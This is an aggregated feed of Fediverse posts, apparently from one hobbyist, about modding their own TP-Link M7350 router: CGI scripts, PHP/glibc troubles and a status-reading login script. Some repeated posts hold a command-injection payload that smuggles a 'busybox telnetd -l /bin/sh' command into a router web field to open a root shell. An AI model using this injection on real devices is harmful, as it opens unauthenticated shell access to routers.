#m7350 — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #m7350, aggregated by home.social.
-
Just deployed the #EFF 's #RayHunter mod to a TPLink #M7350, now i can sniff for IMSI catchers...
-
Lets write a lil tool,
so we don't need to use #telnet anymore
https://codeberg.org/alceawisteria/DeviceHacking/src/branch/main/routers/TPLink_M7350/proggies/2026-01-10-ShellBrowser
And now we can use (the previously enabled lighttpd listing extended by an html wrapper and make cgi-bin execute *sh.
Without any command line. In the #webbrowser .
❤️ Lovely
Whats that ?
If you copy in a sh onto your router externalSD ?
..
Sure. added a FixPermission button just for that. :abloblamp:
I like #CgiBin . Is nice
(I kinda god bamboozled by FileExplorer putting a lock on the files and them not being written by the sh. Seems like WinSCP handles that better. Darn you #Windows #Fileexplorer )
#repost •acws #acws #m7350 #tplink -
Lets write a lil tool,
so we don't need to use #telnet anymore
https://codeberg.org/alceawisteria/DeviceHacking/src/branch/main/routers/TPLink_M7350/proggies/2026-01-10-ShellBrowser
And now we can use (the previously enabled lighttpd listing extended by an html wrapper and make cgi-bin execute *sh.
Without any command line. In the #webbrowser .
❤️ Lovely
Whats that ?
If you copy in a sh onto your router externalSD ?
..
Sure. added a FixPermission button just for that. :abloblamp:
I like #CgiBin . Is nice
(I kinda god bamboozled by FileExplorer putting a lock on the files and them not being written by the sh. Seems like WinSCP handles that better. Darn you #Windows #Fileexplorer )
#repost •acws #acws #m7350 #tplink -
Lets write a lil tool,
so we don't need to use #telnet anymore
https://codeberg.org/alceawisteria/DeviceHacking/src/branch/main/routers/TPLink_M7350/proggies/2026-01-10-ShellBrowser
And now we can use (the previously enabled lighttpd listing extended by an html wrapper and make cgi-bin execute *sh.
Without any command line. In the #webbrowser .
❤️ Lovely
Whats that ?
If you copy in a sh onto your router externalSD ?
..
Sure. added a FixPermission button just for that. :abloblamp:
I like #CgiBin . Is nice
(I kinda god bamboozled by FileExplorer putting a lock on the files and them not being written by the sh. Seems like WinSCP handles that better. Darn you #Windows #Fileexplorer )
#repost •acws #acws #m7350 #tplink -
Lets write a lil tool,
so we don't need to use #telnet anymore
https://codeberg.org/alceawisteria/DeviceHacking/src/branch/main/routers/TPLink_M7350/proggies/2026-01-10-ShellBrowser
And now we can use (the previously enabled lighttpd listing extended by an html wrapper and make cgi-bin execute *sh.
Without any command line. In the #webbrowser .
❤️ Lovely
Whats that ?
If you copy in a sh onto your router externalSD ?
..
Sure. added a FixPermission button just for that. :abloblamp:
I like #CgiBin . Is nice
(I kinda god bamboozled by FileExplorer putting a lock on the files and them not being written by the sh. Seems like WinSCP handles that better. Darn you #Windows #Fileexplorer )
#repost •acws #acws #m7350 #tplink -
Lets write a lil tool,
so we don't need to use #telnet anymore
https://codeberg.org/alceawisteria/DeviceHacking/src/branch/main/routers/TPLink_M7350/proggies/2026-01-10-ShellBrowser
And now we can use (the previously enabled lighttpd listing extended by an html wrapper and make cgi-bin execute *sh.
Without any command line. In the #webbrowser .
❤️ Lovely
Whats that ?
If you copy in a sh onto your router externalSD ?
..
Sure. added a FixPermission button just for that. :abloblamp:
I like #CgiBin . Is nice
(I kinda god bamboozled by FileExplorer putting a lock on the files and them not being written by the sh. Seems like WinSCP handles that better. Darn you #Windows #Fileexplorer )
#repost •acws #acws #m7350 #tplink -
Well turns out we can do without #php
Router hates #https connections, so we need to rewrite the entire uptime thing
(Furthermore -spider https is always retruning 404, but router is on, so yea.)
https://codeberg.org/alceawisteria/UptimeMonitor/src/branch/main/sh_ver
But it works.
Now I only need to figure out how to do #cron .
And I'm done.
Guess I'll be writing some customized *sh for it then.
That was *not* on my 2026 Bingo card.
(Note to self, check #GLIBC version on future routers, so you know what it can actually run !)
#repost •acws #acws #m7350 #tplink -
Soooo
./opt/bin/php-cgi: /opt/lib/libc.so.6: version `GLIBC_2.25' not found (required by ./opt/bin/php-cgi)
./opt/bin/php-cgi: /opt/lib/libc.so.6: version `GLIBC_2.27' not found (required by ./opt/bin/php-cgi)
/media/card/php/test_cgi #
/media/card/php/test_cgi # cd ..
/media/card/php #
even #PHP 7.2.2 requires #GLIBC 2.25/2.27! That means ALL the Entware PHP packages are compiled against newer glibc than your router has (GLIBC 2.18).
This seems to a case of "How low can you go" :P
https://bin.entware.net/armv7sf-k3.2/archive/
I'm not sure trying to install php is worth it then.
After all, below 7 means that most of the stuff of mine, including the one I want needs to be rewritten.
Might aswell use #perl or #shell at that point....
#m7350 #tplink
#repost •acws #acws -
How very.. #odd
After a slight #lighhttpd change
----------------
server.modules = (
/ # # Uncomment the CGI assignment line
/ # sed -i 's|^#cgi.assign.*|cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )|' /etc/lighttpd.conf
/ # grep -n "cgi.assign" /etc/lighttpd.conf
141: cgi.assign = ( "" => "" )
144: cgi.assign = ( "" => "" )
248:cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )
/
-------------
and rebooting the #m7350 now #telnet will not renable again with the script.
Whats even weirder.
qcmap_web_cgi throws a 404..
I'm eternally confused
We still get a token no problemo, but somehow telnet is now closed and stays ?
(Why would a router reboot or slight lighttpd change cause this ?)
Should've enabled #adb while I had the chance haha.
Not eternally sad as I was running into brickwalls left and right with #php7 8 and #python ..
And even #perl has issues Ohwell
C:\Users\User>python -c "import requests; r=requests.post('http://192.168.0.1/qcmap_web_cgi', json={'token':'WPL3qTwBJ8YSmbz1','module':'webServer','action':1,'language':'\$(busybox telnetd -l /bin/sh -p 23)'}, headers={'Cookie':'tpweb_token=WPL3qTwBJ8YSmbz1'}); print(r.status_code, r.text)"
<string>:1: SyntaxWarning: invalid escape sequence '\$'
404 <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>404 - Not Found</title>
</head>
<body>
<h1>404 - Not Found</h1>
</body>
</html>
#repost •acws #acws -
How very.. #odd
After a slight #lighhttpd change
----------------
server.modules = (
/ # # Uncomment the CGI assignment line
/ # sed -i 's|^#cgi.assign.*|cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )|' /etc/lighttpd.conf
/ # grep -n "cgi.assign" /etc/lighttpd.conf
141: cgi.assign = ( "" => "" )
144: cgi.assign = ( "" => "" )
248:cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )
/
-------------
and rebooting the #m7350 now #telnet will not renable again with the script.
Whats even weirder.
qcmap_web_cgi throws a 404..
I'm eternally confused
We still get a token no problemo, but somehow telnet is now closed and stays ?
(Why would a router reboot or slight lighttpd change cause this ?)
Should've enabled #adb while I had the chance haha.
Not eternally sad as I was running into brickwalls left and right with #php7 8 and #python ..
And even #perl has issues Ohwell
C:\Users\User>python -c "import requests; r=requests.post('http://192.168.0.1/qcmap_web_cgi', json={'token':'WPL3qTwBJ8YSmbz1','module':'webServer','action':1,'language':'\$(busybox telnetd -l /bin/sh -p 23)'}, headers={'Cookie':'tpweb_token=WPL3qTwBJ8YSmbz1'}); print(r.status_code, r.text)"
<string>:1: SyntaxWarning: invalid escape sequence '\$'
404 <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>404 - Not Found</title>
</head>
<body>
<h1>404 - Not Found</h1>
</body>
</html>
#repost •acws #acws -
How very.. #odd
After a slight #lighhttpd change
----------------
server.modules = (
/ # # Uncomment the CGI assignment line
/ # sed -i 's|^#cgi.assign.*|cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )|' /etc/lighttpd.conf
/ # grep -n "cgi.assign" /etc/lighttpd.conf
141: cgi.assign = ( "" => "" )
144: cgi.assign = ( "" => "" )
248:cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )
/
-------------
and rebooting the #m7350 now #telnet will not renable again with the script.
Whats even weirder.
qcmap_web_cgi throws a 404..
I'm eternally confused
We still get a token no problemo, but somehow telnet is now closed and stays ?
(Why would a router reboot or slight lighttpd change cause this ?)
Should've enabled #adb while I had the chance haha.
Not eternally sad as I was running into brickwalls left and right with #php7 8 and #python ..
And even #perl has issues Ohwell
C:\Users\User>python -c "import requests; r=requests.post('http://192.168.0.1/qcmap_web_cgi', json={'token':'WPL3qTwBJ8YSmbz1','module':'webServer','action':1,'language':'\$(busybox telnetd -l /bin/sh -p 23)'}, headers={'Cookie':'tpweb_token=WPL3qTwBJ8YSmbz1'}); print(r.status_code, r.text)"
<string>:1: SyntaxWarning: invalid escape sequence '\$'
404 <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>404 - Not Found</title>
</head>
<body>
<h1>404 - Not Found</h1>
</body>
</html>
#repost •acws #acws -
How very.. #odd
After a slight #lighhttpd change
----------------
server.modules = (
/ # # Uncomment the CGI assignment line
/ # sed -i 's|^#cgi.assign.*|cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )|' /etc/lighttpd.conf
/ # grep -n "cgi.assign" /etc/lighttpd.conf
141: cgi.assign = ( "" => "" )
144: cgi.assign = ( "" => "" )
248:cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )
/
-------------
and rebooting the #m7350 now #telnet will not renable again with the script.
Whats even weirder.
qcmap_web_cgi throws a 404..
I'm eternally confused
We still get a token no problemo, but somehow telnet is now closed and stays ?
(Why would a router reboot or slight lighttpd change cause this ?)
Should've enabled #adb while I had the chance haha.
Not eternally sad as I was running into brickwalls left and right with #php7 8 and #python ..
And even #perl has issues Ohwell
C:\Users\User>python -c "import requests; r=requests.post('http://192.168.0.1/qcmap_web_cgi', json={'token':'WPL3qTwBJ8YSmbz1','module':'webServer','action':1,'language':'\$(busybox telnetd -l /bin/sh -p 23)'}, headers={'Cookie':'tpweb_token=WPL3qTwBJ8YSmbz1'}); print(r.status_code, r.text)"
<string>:1: SyntaxWarning: invalid escape sequence '\$'
404 <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>404 - Not Found</title>
</head>
<body>
<h1>404 - Not Found</h1>
</body>
</html>
#repost •acws #acws -
How very.. #odd
After a slight #lighhttpd change
----------------
server.modules = (
/ # # Uncomment the CGI assignment line
/ # sed -i 's|^#cgi.assign.*|cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )|' /etc/lighttpd.conf
/ # grep -n "cgi.assign" /etc/lighttpd.conf
141: cgi.assign = ( "" => "" )
144: cgi.assign = ( "" => "" )
248:cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )
/
-------------
and rebooting the #m7350 now #telnet will not renable again with the script.
Whats even weirder.
qcmap_web_cgi throws a 404..
I'm eternally confused
We still get a token no problemo, but somehow telnet is now closed and stays ?
(Why would a router reboot or slight lighttpd change cause this ?)
Should've enabled #adb while I had the chance haha.
Not eternally sad as I was running into brickwalls left and right with #php7 8 and #python ..
And even #perl has issues Ohwell
C:\Users\User>python -c "import requests; r=requests.post('http://192.168.0.1/qcmap_web_cgi', json={'token':'WPL3qTwBJ8YSmbz1','module':'webServer','action':1,'language':'\$(busybox telnetd -l /bin/sh -p 23)'}, headers={'Cookie':'tpweb_token=WPL3qTwBJ8YSmbz1'}); print(r.status_code, r.text)"
<string>:1: SyntaxWarning: invalid escape sequence '\$'
404 <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>404 - Not Found</title>
</head>
<body>
<h1>404 - Not Found</h1>
</body>
</html>
#repost •acws #acws -
So you are trying to tell me that noone bothered to archive these #entware files1592
phodav_2.5-1_armv7-3.2.ipk 18-Apr-2021 13:23 28453
php7-cgi_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 1507945
php7-cli_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 1527762
php7-fastcgi_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 786
php7-fpm_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 1562752
php7-mod-bcmath_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 12214
php7-mod-calendar_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 10578
php7-mod-ctype_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 3104
php7-mod-curl_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 33116
php7-mod-dom_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 45322
php7-mod-exif_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 27343
php7-mod-fileinfo_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 401782
php7-mod-filter_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 15741
php7-mod-ftp_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 17577
php7-mod-gd_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 26089
php7-mod-gettext_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 4391
and now they are Gone ???
What is the #IT community even doing anyways ?
https://web.archive.org/web/20210613113743/https://bin.entware.net/armv7sf-k3.2/
Now I can't get a 2.2.7 GLIBC to be able to use #php 8
And I cannot get a #php7 which might just be compatible with my old one as there is no backup on da whole. wide. web
A
Ma
Zing.
:blobcatnotlike:
#repost •acws #acws #m7350 #tplink -
@m0veax
https://codeberg.org/alceawisteria/DeviceHacking/src/branch/main/routers/TPLink_M7350/Telnet_Enable_M7350.pyIs probably the most foolproof variant.
And I did not even have to reset my router :) -
👀...
Thats exactly how I recall it going last time too.
Always {result 1}But telnet remains "conn err"
Maybe 5.2 does something differen ?
(It looks like you could even try this without SH and instead use a local html file and try from there, injecting the command, but same result. No telnet - yet)
#tplink #m7350If there was a debug version or something...
-
Say hello to "The #Internetbucket"
My best invention yet :ablobcatrave:
- @dr_muesli
It Fills with Overuse instead of emptying
https://codepen.io/ryedai1/pen/NPrGXxK
Its still very .. erm un bucket like..
Désolé
But the data is updated automagically.
:abloblamp:
(The fetch php is amended to my #M7350 so if you have a different you'd need to get your own
To commemorate this:
Re: https://infosec.exchange/@alcea/115791774641598327
#repost •acws #acws #CodeAlcea
Protip: Add a "?animate" or perhaps even a "speed=1" for extra #coolness :blobcatthinkingsmirk: -
Say hello to "The #Internetbucket"
My best invention yet :ablobcatrave:
- @dr_muesli
It Fills with Overuse instead of emptying
https://codepen.io/ryedai1/pen/NPrGXxK
Its still very .. erm un bucket like..
Désolé
But the data is updated automagically.
:abloblamp:
(The fetch php is amended to my #M7350 so if you have a different you'd need to get your own
Re: https://infosec.exchange/@alcea/115791774641598327
#repost •acws #acws #CodeAlcea
Protip: Add a "?animate" or perhaps even a "speed=1" for extra #coolness :blobcatthinkingsmirk:
To commemorate this: -
Say hello to "The #Internetbucket"
My best invention yet :ablobcatrave:
- @dr_muesli
It Fills with Overuse instead of emptying
https://codepen.io/ryedai1/pen/NPrGXxK
Its still very .. erm un bucket like..
Désolé
But the data is updated automagically.
:abloblamp:
(The fetch php is amended to my #M7350 so if you have a different you'd need to get your own
Re: https://infosec.exchange/@alcea/115791774641598327
#repost •acws #acws #CodeAlcea
Protip: Add a "?animate" or perhaps even a "speed=1" for extra #coolness :blobcatthinkingsmirk:
To commemorate this: -
Say hello to "The #Internetbucket"
My best invention yet :ablobcatrave:
- @dr_muesli
It Fills with Overuse instead of emptying
https://codepen.io/ryedai1/pen/NPrGXxK
Its still very .. erm un bucket like..
Désolé
But the data is updated automagically.
:abloblamp:
(The fetch php is amended to my #M7350 so if you have a different you'd need to get your own
To commemorate this:
Re: https://infosec.exchange/@alcea/115791774641598327
#repost •acws #acws #CodeAlcea
Protip: Add a "?animate" or perhaps even a "speed=1" for extra #coolness :blobcatthinkingsmirk: -
Regarding #Tplink #m7350
I had some trouble getting #telnet to work.
I surmise my m7350 is a v10 and perhaps that could cause difficulties.The tl;dr is:
I want telnet so i can instruct it to run a #php server on boot to let small progs run on boot while keeping the rest of the routers capabilities intact.I'm not interested in downright fw replacement.
What is the workflow for that/ what tools are best used ?
-
And that is the story of how I got my #router to tell me its inner deepest #microSD secrets :ablobcatrave: :abloblamp:
#!/bin/bash
HOST="192.168.0.1"
# 1. Get Nonce
NONCE_RESPONSE=$(curl -s -X POST -d '{"module":"authenticator","action":0}' "http://$HOST/cgi-bin/auth_cgi")
NONCE=$(echo "$NONCE_RESPONSE" | sed -n 's/.*"nonce":[[:space:]]*"\([^"]*\)".*/\1/p')
# 2. Login
read -s -p "Enter Admin Password: " PASSWORD
echo >&2
DIGEST=$(echo -n "${PASSWORD}:${NONCE}" | md5sum | cut -d' ' -f1)
LOGIN_RESPONSE=$(curl -s -X POST -d "{\"module\":\"authenticator\",\"action\":1,\"digest\":\"$DIGEST\"}" "http://$HOST/cgi-bin/auth_cgi")
TOKEN=$(echo "$LOGIN_RESPONSE" | sed -n 's/.*"token":[[:space:]]*"\([^"]*\)".*/\1/p')
if [ -z "$TOKEN" ]; then echo "Login failed"; exit 1; fi
# 3. Fetch Status
FULL_DATA=$(curl -s -X POST \
-H "Cookie: tpweb_token=$TOKEN" \
-d "{\"token\":\"$TOKEN\",\"module\":\"status\",\"action\":0}" \
"http://$HOST/cgi-bin/web_cgi")
# 4. Parse with KB to GB Math (1024 * 1024)
echo "$FULL_DATA" | tr -d '"{}' | tr '\t' ' ' | tr ',' '\n' | awk -F: '
{ gsub(/^[ \t]+|[ \t]+$/, "", $1); gsub(/^[ \t]+|[ \t]+$/, "", $2); }
$1 == "model" { model=$2 }
$1 == "ipv4" { ip=$2 }
$1 == "voltage" { bat=$2 }
$1 == "status" { st=($2==1?"Ready":"Empty") }
# Logic: Values are in KB. Divide by 1048576 (1024*1024) to get GB.
$1 == "volume" { vol=$2/1048576 }
$1 == "used" { usd=$2/1048576 }
$1 == "left" { lft=$2/1048576 }
END {
printf "\n=== DEVICE: %s ===\n", model
printf "IP Address: %s\n", ip
printf "Battery: %s%%\n", bat
printf "---------------------------\n"
if (vol > 0) {
printf "SD Status: %s\n", st
printf "Total Size: %.2f GB\n", vol
printf "Used Space: %.2f GB (%.1f%%)\n", usd, (usd/vol)*100
printf "Free Space: %.2f GB\n", lft
} else {
print "SD Card: Not Found or Unmounted"
}
}
'
echo "Done."
read -n1 -r -p "Press any key to exit..."
And here I thought I would have to use ftp to fail my way to an answer
(But as the official apk had better info...
#Selenium ftw.
All it takes is running a recorder browser session and poking around in the right place on the webinterface. Wrote a #syslog viewer too while at it.
#CodeAlcea #m7350 #sdcard #tplink #Cea
#repost •acws #acws -
And that is the story of how I got my #router to tell me its inner deepest #microSD secrets :ablobcatrave: :abloblamp:
#!/bin/bash
HOST="192.168.0.1"
# 1. Get Nonce
NONCE_RESPONSE=$(curl -s -X POST -d '{"module":"authenticator","action":0}' "http://$HOST/cgi-bin/auth_cgi")
NONCE=$(echo "$NONCE_RESPONSE" | sed -n 's/.*"nonce":[[:space:]]*"\([^"]*\)".*/\1/p')
# 2. Login
read -s -p "Enter Admin Password: " PASSWORD
echo >&2
DIGEST=$(echo -n "${PASSWORD}:${NONCE}" | md5sum | cut -d' ' -f1)
LOGIN_RESPONSE=$(curl -s -X POST -d "{\"module\":\"authenticator\",\"action\":1,\"digest\":\"$DIGEST\"}" "http://$HOST/cgi-bin/auth_cgi")
TOKEN=$(echo "$LOGIN_RESPONSE" | sed -n 's/.*"token":[[:space:]]*"\([^"]*\)".*/\1/p')
if [ -z "$TOKEN" ]; then echo "Login failed"; exit 1; fi
# 3. Fetch Status
FULL_DATA=$(curl -s -X POST \
-H "Cookie: tpweb_token=$TOKEN" \
-d "{\"token\":\"$TOKEN\",\"module\":\"status\",\"action\":0}" \
"http://$HOST/cgi-bin/web_cgi")
# 4. Parse with KB to GB Math (1024 * 1024)
echo "$FULL_DATA" | tr -d '"{}' | tr '\t' ' ' | tr ',' '\n' | awk -F: '
{ gsub(/^[ \t]+|[ \t]+$/, "", $1); gsub(/^[ \t]+|[ \t]+$/, "", $2); }
$1 == "model" { model=$2 }
$1 == "ipv4" { ip=$2 }
$1 == "voltage" { bat=$2 }
$1 == "status" { st=($2==1?"Ready":"Empty") }
# Logic: Values are in KB. Divide by 1048576 (1024*1024) to get GB.
$1 == "volume" { vol=$2/1048576 }
$1 == "used" { usd=$2/1048576 }
$1 == "left" { lft=$2/1048576 }
END {
printf "\n=== DEVICE: %s ===\n", model
printf "IP Address: %s\n", ip
printf "Battery: %s%%\n", bat
printf "---------------------------\n"
if (vol > 0) {
printf "SD Status: %s\n", st
printf "Total Size: %.2f GB\n", vol
printf "Used Space: %.2f GB (%.1f%%)\n", usd, (usd/vol)*100
printf "Free Space: %.2f GB\n", lft
} else {
print "SD Card: Not Found or Unmounted"
}
}
'
echo "Done."
read -n1 -r -p "Press any key to exit..."
And here I thought I would have to use ftp to fail my way to an answer
(But as the official apk had better info...
#Selenium ftw.
All it takes is running a recorder browser session and poking around in the right place on the webinterface. Wrote a #syslog viewer too while at it.
#CodeAlcea #m7350 #sdcard #tplink #Cea
#repost •acws #acws -
Say what you will about #Deepseek , but for #hacking it can be useful.
It is quite dumb and you have to hand hold it a bit, but..
#Selenium + #API call reverse engineering and I can login to my dumb #TPLink router via #sh now.
I wonder if I could reboot it from shell or even read out its microSD capacity left...
Hmmmm......
I don't see much else use for #AI tho tbh.
#Art ? Get outta here.
#Movies ? Get lost.
#Cloning #Voice actors and deprive them of their living ? Are you lost ?
Anyways.
It is always the same with humans misusing tools ...
At least this is now abit more useful than my past attempts especially as dumb #TPLink closed #telnet in that latest update.
I'll hack this thing to bits if I must... :angry_cirno:
(Altho the thing I wanted the most. Accessing #sftp from #webbrowser via a simple php is already possible... )
I mean I feel sorry for the people who think #ArtificialIntelligence (emphasis on artificial) is #coding or anything near it.
I started with js and ahk in like 2007. Added #php when js needed handholding and only arrived at #python when a companies security guidelines barred #ahk (as keylogger lol)
So yeah.
But poor people.. Poor pooor people.
And I do catch myself sometimes thinking "yeah lets toss this trash into multiple LLMs to see what they get.
Sometimes I bounce the ideas between them or restart sessions as sometimes they have ideas you can't finde with #searchengines.
Imo LLMs are search engines.
Nothing more. Nothing less.
Very dumb, but vast in data.
#repost •acws #acws #M7350 -
@polyfloyd •acws #acws
ah jelly !
Any device free'd from its shackles is a #winI couldn't get #Telnet enabled on my #m7350 #tplink
It is so stubborn
:ablobcatgrumpy:All in all custom #cfw are only feasable if a community exists..
https://www.pentestpartners.com/security-blog/cve-2019-12103-analysis-of-a-pre-auth-rce-on-the-tp-link-m7350-with-ghidra/
(the route outlined here has been patched)
https://github.com/m0veax/rayhunter-tplink-m7350 https://github.com/m0veax/tplink_m7350Shame #OpenWRT d have been nice
Wonder what #Lidl would think 😂